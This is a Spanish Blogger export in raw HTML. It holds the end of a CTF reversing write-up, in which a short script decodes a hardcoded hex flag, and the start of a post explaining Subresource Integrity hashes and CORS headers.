baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print6 = print1+print5</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print4 = print6.decode(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"hex"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">if</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"> a() == print10:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">(print4)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #569cd6; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">else</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">:</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">(print2)</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Nuestro script necesita que le aportemos un string con lo que probamos su funcionamiento, donde observamos que si no se cumplen las condiciones nos arroja print(print2) > Password incorrecta</span></div>
<b style="font-weight: normal;"><br /></b>
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/reversing/reversing1</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># python reverse_me.py AAAA</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Password incorrecta</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Examinando el código podemos saltarnos la validación del script a través del siguiente exploit (get_flag.py):</span></div>
<b style="font-weight: normal;"><br /></b>
<div align="left" dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody>
<tr style="height: 0pt;"><td style="background-color: #1e1e1e; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">#!/usr/bin/env python</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import sys</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">import base64</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print1 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"4a415359507b43453646333639463543304635364333"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print5 = </span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"3033324534443730453344304237367d"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print6 = print1+print5</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print4 = print6.decode(</span><span style="background-color: #1e1e1e; color: #d69d85; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">"hex"</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: #4ec9b0; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">print</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">(print4)</span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">root@1v4n:~/CTF/JASYPCTF2019/reversing/reversing1</span><span style="background-color: #1e1e1e; color: #57a64a; font-family: Consolas,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"># python get_flag.py </span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><br /></span><span style="background-color: #1e1e1e; color: gainsboro; font-family: Consolas,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">JASYP{CE6F369F5C0F56C3032E4D70E3D0B76}</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">Y ahí está la flag es: </span><span style="background-color: #cccccc; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;">JASYP{CE6F369F5C0F56C3032E4D70E3D0B76}</span></div>
<b style="font-weight: normal;"><br /></b>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: #cccccc; color: black; font-family: Calibri,sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; white-space: pre;"><span style="border: none; display: inline-block; height: 205px; overflow: hidden; width: 279px;"><img height="205" src="https://lh3.googleusercontent.com/W8M1POmdAsVuIb5Mhhx_T74Zy1KmNFx3KjefKWnC9Rru2t0cPD2eiV-FfUbrnzXwyedNKdXpHpOd0wRtt-0EcTspNit2SYPfA3qhfD0X0YaUVlbUrLIIAXX8ATmwcKahJtLyBRTL" style="margin-left: 0px; margin-top: 0px;" width="279" /></span></span></div>
<br /><br /><br /><span style="font-family: Calibri, sans-serif; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Autor: 1v4n a.k.a. @1r0Dm448O</span><span style="font-family: Calibri, sans-serif; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri, sans-serif; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Twitter: </span><a href="https://twitter.com/1r0Dm448O" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Calibri, sans-serif; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://twitter.com/1r0Dm48O</span></a>Raul Renaleshttp://www.blogger.com/profile/00004470679001888541noreply@blogger.com0Hontoba, 19119, Guadalajara, Spain40.4421439 -3.047604599999999740.3938114 -3.1282825999999995 40.4904764 -2.9669266tag:blogger.com,1999:blog-4789894782637921835.post-33099567710864101182020-02-04T12:21:00.000+01:002020-02-04T12:29:26.693+01:00SRI: SubResource Integrity<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIyMArWQgcXq7SDNfq5NpsbYqF3t5cnQu3bHVgYoW5nbrYlTbG2nCmKJ-KUSafXcT-lHvK2HuvUQh0f1dVlkdYoKTyddqkhvwEzyUMnNVRyF9SO-KH1d55HJOaGrFRW2LFor52sbYSeT3/s1600/SRI.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="350" data-original-width="892" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTIyMArWQgcXq7SDNfq5NpsbYqF3t5cnQu3bHVgYoW5nbrYlTbG2nCmKJ-KUSafXcT-lHvK2HuvUQh0f1dVlkdYoKTyddqkhvwEzyUMnNVRyF9SO-KH1d55HJOaGrFRW2LFor52sbYSeT3/s640/SRI.jpg" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">By @raulrenales</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div style="text-align: justify;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Hace unos días unos amigos que tienen varias plataformas de blogging me consultaron por un problema que estaban comenzando a tener con los recursos de terceros que utilizaban en sus webs. Básicamente el problema era que en un determinado recurso, el fabricante había tenido una brecha de seguridad y el recurso había quedado comprometido, de tal manera que todas las plataformas web que utilizaban el recurso incorporan unas funciones que permiten la subida de archivos y obtención de información.</span></div>
<a name='more'></a><span style="font-family: "arial"; font-size: 11pt; text-align: justify; white-space: pre;"><br /></span>
<span style="font-family: "arial"; font-size: 11pt; text-align: justify; white-space: pre;">La verdad que estaban un poco apurados, pero por suerte les hable de SRI (SubResource Integrity) </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">que es una característica que permite a los navegadores comprobar la integridad de los archivos </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mediante un Hash que el desarrollador suministra en el tag de html y que es comparado con el </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">resultante del recurso que se quiere verificar.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>CÓMO IMPLEMENTARLO</b></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cuando adjuntamos un recurso a nuestra web utilizamos diferentes tags html, en el caso del siguiente</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> ejemplo queremos adjuntar una librería de javascript. Como se puede observar uno de los parámetros</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> es integrity, al cual como valor se le pasa un Hash de tipo SRI:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><script src="https://javascript.com/libreria.js" </span></blockquote>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">integrity="sha384-oqVuAfXRKap7fdgcC34e2kM6+R9GqQ8K/uxy9rx723rf2345twwx4JwY8wC"</span></blockquote>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> crossorigin="*"></script></span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Al visitar la página, el navegador del usuario verificará la integridad del fichero comparando el </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">resultado de calcular el hash del mismo con el que el desarrollador ha suministrado en la propiedad</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> integrity.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Como complemento tenemos el Access-Control-Allow-Origin, que permite que el host de destino </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">sepa que la solicitud proviene de una fuente externa y cuál es esa fuente. </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Access-Control-Allow-Origin se puede establecer en uno de tres valores:</span><br />
<br />
<ul>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">null, que niega todos los orígenes</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">*, el operador comodín, que permite todos los orígenes</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">Una lista de origen de uno o más orígenes separados por espacios.</span></li>
</ul>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Los siguientes ejemplos son todos los encabezados válidos.</span><br />
<br />
<ul>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">Access-Control-Allow-Origin: null</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">Access-Control-Allow-Origin: *</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">Access-Control-Allow-Origin: </span><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">http://foo.example</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">Access-Control-Allow-Origin: http://foo.example http://bar.example</span></li>
</ul>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>OK, ¿COMO CALCULO EL SRI HASH?</b></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Una vez que sabemos cómo utilizar integrity, vamos a ver como obtener los Hashes para suministrarle</span><br />
<span style="font-family: "arial"; font-size: 11pt; white-space: pre;">la información.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Es posible obtener los Hashes utilizando OpenSSL mediante los siguientes comandos:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre;"><b><i>cat libreria.js | openssl dgst -sha384 -binary | openssl base64 -A</i></b></span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">o con shasum usando:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre;"><b><i>shasum -b -a 384 libreria.js | awk '{print $ 1}' | xxd -r -p | base64</i></b></span></blockquote>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Si no te mola mucho el mundo comando, también existe la posibilidad de generar los Hashes </span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mediante la siguiente WEB: </span><a href="https://www.srihash.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.srihash.org/</span></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 315px; overflow: hidden; width: 624px;"><img height="315" src="https://lh5.googleusercontent.com/YF2Qz_aOUpmDIU5ULNFCiIgY1ZIRLGyIeI4SCgimhpEmmSJwpM-sHBLHlNv20CKy_7_t7page9ltq0ITFaWjPIv1VBws0DsFctEwm-iWha9m_QW3Zu5metx2UPPdZcz5t22hf44S" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">Resultado de realizar el cálculo sobre una librería de Jquery:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
